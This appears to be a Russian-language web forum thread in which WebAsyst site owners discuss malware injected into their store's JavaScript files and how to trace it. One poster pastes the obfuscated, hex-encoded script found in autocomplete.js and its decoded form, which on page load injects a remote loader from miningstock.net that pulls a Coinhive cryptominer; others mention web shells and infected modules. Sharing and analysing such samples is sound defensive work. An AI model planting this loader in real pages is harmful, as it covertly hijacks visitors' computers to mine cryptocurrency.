[Помощь] СРОЧНО в cpt_maincontent - вставили вирусы - где копать?

Тема в разделе "WebAsyst", создана пользователем Pal, 29 окт 2015.

Модераторы: mdss
  1. RORC

    RORC

    Регистр.:
    14 июн 2013
    Сообщения:
    327
    Симпатии:
    110
    [​IMG]
     
  2. kam-kamalla

    kam-kamalla Создатель

    Регистр.:
    14 июн 2013
    Сообщения:
    24
    Симпатии:
    0
    тоже нашел у себя майнер, причем за 1 день 3 раза заразу заносили разными путями.

    к папке с скриптами (js) был кривой доступ либо через редактор залезли, не знаю, тоже пришлось все пароли менять и проверять скрипты

    первый раз - через mloader.js и behavior.js - также как 3 месяца назад

    второй раз, буквально через пару часов, снова mloader.js и niftycube.js

    тут же грохнул.

    под конец закодировали и закинули в autocomplete.js
    такой текст

    var _0x7824=["\x6F\x6E\x6C\x6F\x61\x64","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x2F\x2F\x6D\x69\x6E\x69\x6E\x67\x73\x74\x6F\x63\x6B\x2E\x6E\x65\x74\x2F\x63\x6F\x6D\x6D\x6F\x6E\x2F\x6A\x73\x2F\x6D\x6C\x6F\x61\x64\x65\x72\x2E\x6A\x73\x3F\x69\x64\x3D\x33\x32\x39\x38\x26\x74\x68\x3D\x35\x30","\x74\x65\x78\x74","\x73\x6F\x72\x74\x74\x61\x62\x6C\x65\x2E\x69\x6E\x69\x74\x28\x29","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"];window[_0x7824[0]]= function(){var _0xe5ecx1=document[_0x7824[2]](_0x7824[1]);_0xe5ecx1[_0x7824[3]]= _0x7824[4];_0xe5ecx1[_0x7824[5]]= _0x7824[6];document[_0x7824[9]](_0x7824[8])[0][_0x7824[7]](_0xe5ecx1)}

    при переводе Hex Decoder получается

    var _0x7824=["onload","script","createElement","src","//miningstock.net/common/js/mloader.js?id=3298&th=50","text","sorttable.init()","appendChild","head","getElementsByTagName"];window[_0x7824[0]]= function(){var _0xe5ecx1=document[_0x7824[2]](_0x7824[1]);_0xe5ecx1[_0x7824[3]]= _0x7824[4];_0xe5ecx1[_0x7824[5]]= _0x7824[6];document[_0x7824[9]](_0x7824[8])[0][_0x7824[7]]


    "miningstock.net/common/js/mloader.js?id=3298&th=50", снова грузил coinhive.min.js
     
  3. RORC

    RORC

    Регистр.:
    14 июн 2013
    Сообщения:
    327
    Симпатии:
    110
    шел где-то залит, отследите по логам сервера. Обычно обращения типа POST, только в заказах, на других страницах быть не должно.
     
  4. kam-kamalla

    kam-kamalla Создатель

    Регистр.:
    14 июн 2013
    Сообщения:
    24
    Симпатии:
    0
    посмотрим, все равно узнаем причину и источник рано или поздно. буду внимательно наблюдать
     
  5. RORC

    RORC

    Регистр.:
    14 июн 2013
    Сообщения:
    327
    Симпатии:
    110
    Может пора уже движок сменить? Там где поддерживаю сайты, часть функций переписал, т.к. на старом php сидеть не очень интересно.
     
  6. sealery

    sealery Создатель

    Регистр.:
    20 май 2012
    Сообщения:
    20
    Симпатии:
    2
    Модули проверяйте, я однажды готовый модуль поставил а он с шеллом оказался.